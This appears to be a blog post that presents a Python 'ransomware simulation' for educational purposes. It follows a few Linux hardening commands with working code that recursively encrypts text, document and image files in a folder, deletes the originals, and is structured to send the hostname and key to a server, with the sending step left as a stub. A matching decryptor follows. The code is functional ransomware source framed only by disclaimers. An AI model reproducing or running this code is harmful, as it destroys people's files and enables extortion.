It is a virus which encrypt your data with a Ransom key. Post-attack, all data is stuck and cannot be retrieved without the key. It is the dangerous malware of the decade; often not removable or destroyable. As a professional, I had the chance to interact with a live Ransomware attack alongside a blue team. Here, I am sharing a simulation code for educational purposes and steps to prevent your device or organization from such threats.
Before experimenting with simulation code, you must secure your environment. Follow these steps to harden a Linux system (like Kali):
1. Update your system:
sudo apt update2. Install and configure a Firewall (UFW):
sudo apt install ufwIf you are using SSH, disable root login and restart the service. Always keep a backup in an external location.
3. Install ClamAV Antivirus:
sudo apt install clamav clamav-daemonScan and update regularly:
sudo freshclam
sudo clamscan -r /Warning: I am not responsible for any loss of data. Do not run any code unless you totally understand it. This is for educational purposes only. Run at your own risk.
import gc
import os
import json
import uuid
import ctypes
import socket
import subprocess
from cryptography.fernet import Fernet
class RansomwareSimulator:
def __init__(self, directory, server_host, server_port, file_extensions):
self.directory = directory
self.server_host = server_host
self.server_port = server_port
self.file_extensions = file_extensions
self.key = Fernet.generate_key()
def encrypt_file(self, file_path):
fernet = Fernet(self.key)
with open(file_path, 'rb') as file:
original = file.read()
encrypted = fernet.encrypt(original)
encrypted_file_path = file_path + ".denizhalil"
with open(encrypted_file_path, 'wb') as encrypted_file:
encrypted_file.write(encrypted)
os.remove(file_path)
return encrypted_file_path
def find_and_encrypt_files(self):
for root, _, files in os.walk(self.directory):
for file in files:
if any(file.endswith(ext) for ext in self.file_extensions):
file_path = os.path.join(root, file)
self.encrypt_file(file_path)
def send_data_to_server(self):
data = {'hostname': socket.gethostname(), 'key': self.key.decode()}
# Logic to send to server...
def main():
file_extensions = ['.txt', '.docx', '.jpg']
directory = 'dosyalar/'
simulator = RansomwareSimulator(directory, '10.0.2.37', 12345, file_extensions)
simulator.find_and_encrypt_files()
if __name__ == "__main__":
main()import os
from cryptography.fernet import Fernet
class Decoder:
def __init__(self, directory):
self.directory = directory
def decrypt_file(self, file_path, key):
fernet = Fernet(key)
with open(file_path, 'rb') as file:
encrypted_data = file.read()
decrypted_data = fernet.decrypt(encrypted_data)
original_file_path = file_path.replace(".denizhalil", "")
with open(original_file_path, 'wb') as file:
file.write(decrypted_data)
os.remove(file_path)
def find_and_decrypt_files(self, key):
for root, _, files in os.walk(self.directory):
for file in files:
if file.endswith(".denizhalil"):
self.decrypt_file(os.path.join(root, file), key)
def main():
key = input("Enter decryption key: ")
decoder = Decoder('dosyalar/')
decoder.find_and_decrypt_files(key)
if __name__ == "__main__":
main()Final Warning: Do not run any of this code without deep technical knowledge of how file systems and encryption work.